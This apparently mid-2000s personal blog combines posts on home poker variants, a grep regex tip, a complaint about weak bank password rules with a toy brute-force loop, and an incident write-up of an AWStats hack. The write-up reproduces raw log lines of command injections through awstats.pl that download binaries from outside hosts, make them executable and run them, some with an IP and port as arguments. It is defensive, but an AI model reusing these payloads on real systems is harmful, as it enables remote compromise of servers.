Chovy's Blog

Since this is a hot topic these days (seems everybody at work is in at least one game), what kind of poker games do you all play?

Here’s the current list of what I play at the saturday night poker game I host with friends.

Night Baseball
7 cards dealt face down, then you roll ‘em one at a time with betting each round. 9′s are wild, 3 showing – you buy the pot and it’s wild for everybody (otherwise fold), 4 showing – you get an extra card.

5-Card Draw
Dealt 5, bet, then draw up to 4 more cards, bet again, then show hands.

Anaconda
7 cards, bet once, pass the trash (3 cards) left, then bet again.

Texas Hold ‘Em
Most popular game these days. Deal 2 down, then bet. Muck one off the deck, deal 3 up (community cards), bet again, deal 1 more up, bet. Deal last card up, bet again and show. Make your hand from the best 5 cards.

7-card stud
Deal 2 down, 4 up (betting inbetween each card), 1 down. Make your hand from the best 5 cards.

5-Card Stud
Deal 1 down, 4 up (bet each card).

6-card stud
Deal 1 down, 4 up (bet inbetween each card), 1 down. Best 5 cards wins.

8-Card Stud
Deal 2 down, 4 up (bet inbetween each card), 2 down. Bet again. Best 5 cards wins.

Baseball
Can be played as 5 or 7 card stud (dealt same way). 9′s wild, 3 up you buy the pot and it’s wild for everybody (otherwise fold).

Jacks or Better
Everyone antes, if nobody has a pair of Jacks or better, you re-deal and ante again (helps build the pot).

Low hand wins
All the games can be played where the object is to have the lowest hand (ie – a pair of twos). Wheel or bicycle is the best hand “A2345″.

My favorite 3 games are Anaconda, Night Baseball, and Texas Hold ‘Em.

Many of you may be wondering how to use the regular expression syntax with the infamous ‘grep’ tool.

It took me awhile to figure this out, so I’m posting it so I will always remember it’s on my blog!

First, you have to use -E to invoke extended regular expressions with grep, and you’ll also have to add the parameters: -zl otherwise it won’t treat the string as one line (which it has to do to nested matching).

For example I want to find all tags named “<Bar>” nested inside “<Foo>”:

<Foo>
<Bar>

$grep -rzlE ‘<Foo[^>]*>[^>]*<Bar>’ .

I routinely change my passwords every few months on all my financial providers that I do online business with. The goal is to pick a secure password that is 8 characters in length, has mixed-case alpha-numeric numbers and at least 2 special characters.

An example of a good password would be: “Foo)B4r!”

Part of the problem was when I recently installed Quicken 2005 Premier. The software would only let me send a 6-digit PIN to one of my banks, whereas the bank itself allowed for an alpha-numeric (letters and digits) password. It took me awhile to figure out why I couldn’t download the transactions into Quicken 2005 Premier (complain to Intuit).

The password forced on me by more than one of the companies I do business with consists of something as stupid as a 6-digit password (no letters or special characters). One could crack the account with a script if they know the username. All you’d have to do is write an iteration loop:

while ($i < 999999) {
tryLogin();
$i++;
}

What I’m saying is that this is a very stupid rule – it leads to people using insecure passwords, like their phone number, or birthday.

Frankly, I’m quite disturbed at the lax password policies I’m finding with most of the financial institutions I use. 4 out of 5 of my providers do NOT allow for a secure password.

PayPal is the only site I’ve come across that allows for a secure password as described above.

I encourage you to send a quick email (feel free to copy and paste this blog posting) to your financial services institution in an effort to lobby them so they will implement more secure passwords. Simply go to their home page, and click on their “Contact Us” link (almost all banks and brokerages have this on the home page). Wouldn’t take more than 2 minutes, and if everybody does it, we will see some changes!

Below is a list of all the financial institutions I could think of (if you know of any others, feel free to post their contact info in the comments section):

Bank of America:
1.800.792.0808
email

Patelco Credit Union:
support@patelco.org
415.442.6200 or 1.800.358.8228 (toll-free, nationwide)

Ameritrade:
(click on New Accounts)
U.S. Phone: 800-669-3900
International Phone:
City Code: 402
Number: 970-5805
Canadian Phone: 866-328-3522 or 416-363-9045

Merrill Lynch:
Site Feedback
US: General Inquiries 1-800-MERRILL (637-7455)

Wells Fargo:
Online Banking and Bill Pay:
1-800-956-4442
Email

Schwabb Plan:
Contact Us page
1-800-724-7526

Schwabb:
Email
1-866-855-9102

E*Trade:
Call 1-800-ETRADE-1 (1-800-387-2331)
From outside the U.S., call +1-916-636-2510
Email is only available to customers

Washington Mutual:
I would CC everybody on this page
Personal Banking Customer Service: 800.788.7000
Home Loan Customer Service: 866.926.8937

Tech Credit Union:
Email Form
408-451-9111 or 800-553-0880

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”

I’ve heard people suspect both PHP vulnerabiltiy and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it
did)

system(“cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt);

and dc.zip is also a binary they download and ran:

system(“wget%20gotmoney.100free.com/dc.zip”);

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are perl scripts. One of the perl scripts attempts to connect an irc server, the same server that the people who hacked my site have a channel on #simiens. I couldn’t uncompress dc.zip (which was download in my log files, but I suspect dc.pl is what it contained – who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some japanese online shopping site )
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configurarion files:
find . -name awstats*.conf | xargs cat | grep ‘AllowToUpdateStatsFromBrowser=1′

Replace all those instances so it’s set to 0 instead,
otherwise your customers will be exposed, until you
upgrade awstats.

Traverse the ./logs directory looking for exploits in the log files (67.169.x.x is my own ip, we’ll weed those out with grep -v):

find . -name “*.gz” | xargs zcat | grep awstats.pl | grep -v 67.169.x.x | less
find . -name awstats*.conf | xargs cat | grep ‘AllowToUpdateStatsFromBrowser=1′

Here’s the attack as it happened in my log file:

200.158.37.192 – - [29/Jan/2005:13:57:05 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“/bin/ls”); HTTP/1.1″ 200 3294 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:57:11 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“uname%20-a”); HTTP/1.1″ 200 3302 “-” “Mozilla/4
.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:57:33 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt”); HTTP/1.1″ 200 3207 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:07 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“cd%20/tmp;ls”); HTTP/1.1″ 200 6902 “-” “Mozilla
/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:13 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“wget”); HTTP/1.1″ 200 3302 “-” “Mozilla/4.0 (co
mpatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt); HTTP/1.1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:40 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.
1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:43 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1
” 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:58:53 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“id”); HTTP/1.1″ 200 3272 “-” “Mozilla/4.0 (comp
atible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:59:02 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“wget%20protus.com.br/tt.txt”); HTTP/1.1″ 200 32
15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:59:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“chmod%20777%20tt.txt”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:59:15 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“./tt.txt”); HTTP/1.1″ 200 3293 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:59:47 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“wget%20gotmoney.100free.com/dc.zip”); HTTP/1.1″
200 3215 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:13:59:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“chmod%20777%20dc.zip”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:14:00:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3327 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:14:01:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:14:01:46 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“./dc.zip%20200.204.170.225%205050″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 – - [29/Jan/2005:14:02:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(“./dc.zip%20www.asianashop.com%206262″); HTTP/1.
1″ 200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable input, ie – if it’s a phone number, use a regexp to weed out everything but digits for example in Perl:

if ($phone =~ m|^\d{3}-\d{3}-\d{4}$|g) { phone ok; }

Obviously, international phone numbers won’t work, but you get the idea. Same goes for ANYTHING you pass to the system() command, which is how they hacked this server.

This stresses the point of also keeping your software (hopefully it’s open source) up-to-date. As open source software gets discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (They’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble and executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).